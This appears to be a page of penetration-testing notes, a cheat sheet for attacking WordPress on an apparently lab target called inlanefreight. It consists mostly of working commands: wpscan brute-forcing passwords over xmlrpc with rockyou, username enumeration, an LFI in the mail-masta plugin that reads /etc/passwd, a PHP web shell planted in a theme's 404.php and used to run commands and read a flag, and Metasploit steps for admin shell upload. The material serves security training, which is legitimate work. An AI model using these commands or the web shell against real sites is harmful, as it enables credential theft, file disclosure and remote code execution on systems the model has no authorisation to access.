Wordpress

wpscan --password-attack xmlrpc -t 20 -U admin, david -P passwords.txt --url http://blog.inlanefreight.com

// discovering wp version
curl -s -X GET http://blog.inlanefreight.com | sed 's/href=/\n/g' | sed 's/src=/\n/g' | grep 'wp-content/plugins/*' | cut -d"'" -f2
//via themes
curl -s -X GET http://blog.inlanefreight.com | sed 's/href=/\n/g' | sed 's/src=/\n/g' | grep 'themes' | cut -d"'" -f2

// check user
curl -s -I -X GET http://blog.inlanefreight.com/?author=1

// second method to enumerate users with json request
curl http://blog.inlanefreight.com/wp-json/wp/v2/users | jq

// valid creds
curl -X POST -d "<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>admin</value></param><param><value>CORRECT-PASSWORD</value></param></params></methodCall>" http://blog.inlanefreight.com/xmlrpc.php

// get all methods for xmlrpc
curl -i -s -k -X $'POST' -H $'Host: 138.68.163.76:32302' --data-binary $'<methodCall>\x0d\x0a<methodName>system.listMethods</methodName>\x0d\x0a<params></params>\x0d\x0a</methodCall>\x0d\x0a\x0d\x0a' 'http://138.68.163.76:32302/xmlrpc.php' | wc -l

// wpscan enumeration
wpscan --url http://blog.inlanefreight.com --enumerate --api-token Kffr4fdJzy9qVcTk<SNIP>

// LFI to read passwd
curl http://blog.inlanefreight.com:32302/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

// password attack
wpscan --password-attack xmlrpc -t 20 -U admin, david -P passwords.txt

// brute force password attack on xmlrpc
wpscan --password-attack xmlrpc -t 20 -U roger -P /usr/share/wordlists/rockyou.txt --url http://blog.inlanefreight.com:30594


//edit 404.php of the twentyseventeen theme
// see that the active theme is Transportex so an unused theme 
// such as Twenty Seventeen should be chosen instead.
// Choose a theme and click on Select. Next, choose a non-critical file 
// such as 404.php to modify and add a web shell.
<?php
system($_GET['cmd']);

// RCE via twentyseventeen theme
curl -X GET "http://<target>/wp-content/themes/twentyseventeen/404.php?cmd=id"

//read the flag
curl -X GET "http://blog.inlanefreight.com:30594/wp-content/themes/twentyseventeen/404.php?cmd=cat%20/home/wp-user/flag.txt"

// MSF search wp_admin
//wp_admin_shell_upload
// use 0
// set rhosts blog.inlanefreight.com
// set username admin
// set password ...
// set lhost x.x.x.x
// run

// identified vuln plugin 
// Email Subscribers & Newsletters < 4.2.3 - Multiple Issues
https://wpscan.com/vulnerability/a0764617-6142-4ef7-94f9-1fb923e81e94

PreviousffufNextBroken Auth

Last updated

Was this helpful?